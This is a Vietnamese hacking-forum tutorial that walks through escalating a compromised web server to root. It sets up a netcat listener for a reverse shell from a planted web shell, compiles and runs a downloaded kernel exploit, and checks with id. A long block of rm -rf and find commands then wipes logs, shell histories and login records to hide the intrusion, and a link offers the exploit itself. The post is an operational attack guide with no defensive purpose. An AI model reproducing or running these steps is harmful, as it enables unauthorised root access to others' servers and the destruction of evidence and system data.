[TUT] Get root

Discussion in 'Web Application Security & Hacking' started by Mickey, Dec 9, 2017.

  1. Mickey

    Mickey Hacking For Hacker Staff Member

    Công cụ: netcat , shell

    Netcat: http://downloads.securityfocus.com/tools/nc110.tgz

    Di chuyển tới thư mục chứa netcat

    Mã:
    cd C:\Program Files\Netcat
    [​IMG]

    Chạy lệnh:

    Mã:
    nc -n -l -v -p 443
    [​IMG]

    Run shell và chạy lệnh để xem thông tin phiên bản kernel

    Mã:
    uname -a
    Ở đây ta có kernel 2.6.18-374 2011

    [​IMG]

    Tiếp theo ta backconnect

    [​IMG]
    Sau đó quay lại netcat nếu thấy thông báo như đoạn khoanh đỏ là đã kết nối thành công

    [​IMG]

    - Lên google tìm exploit của kernel và lưu lại dưới dạng file c. ví dụ exploit.c
    Up lên host và nén lại dưới dạng gcc

    Mã:
    gcc exploit.c -o exploit
    chmod 0777 cho nó

    Mã:
    chmod 777 exploit
    Chạy tiếp lệnh:

    Mã:
    ./exploit
    Sau đó gõ lệnh

    Mã:
    id
    để kiểm tra xem đã lên được quyền root hay chưa :)

    * Xóa dấu vết
    Sau khi xong việc thì dùng lần lượt các lệnh sau để xóa dấu vết

    Mã:
    rm -rf /tmp/logs
    rm -rf $HISTFILE
    rm -rf /root/.ksh_history
    rm -rf /root/.bash_history
    rm -rf /root/.ksh_history
    rm -rf /root/.bash_logout
    rm -rf /usr/local/apache/logs
    rm -rf /usr/local/apache/log
    rm -rf /var/apache/logs
    rm -rf /var/apache/log
    rm -rf /var/run/utmp
    rm -rf /var/logs
    rm -rf /var/log
    rm -rf /var/adm
    rm -rf /etc/wtmp
    rm -rf /etc/utmp
    history -c
    find / -name *.bash_history -exec rm -rf {} \;
    find / -name *.bash_logout -exec rm -rf {} \;
    find / -name "log*" -exec rm -rf {} \;
    find / -name *.log -exec rm -rf {} \;
    Bonus: exploit cho phiên bản kernel trong tut: http://www.mediafire.com/view/?hodtf9rt3o7rb10
     

Share This Page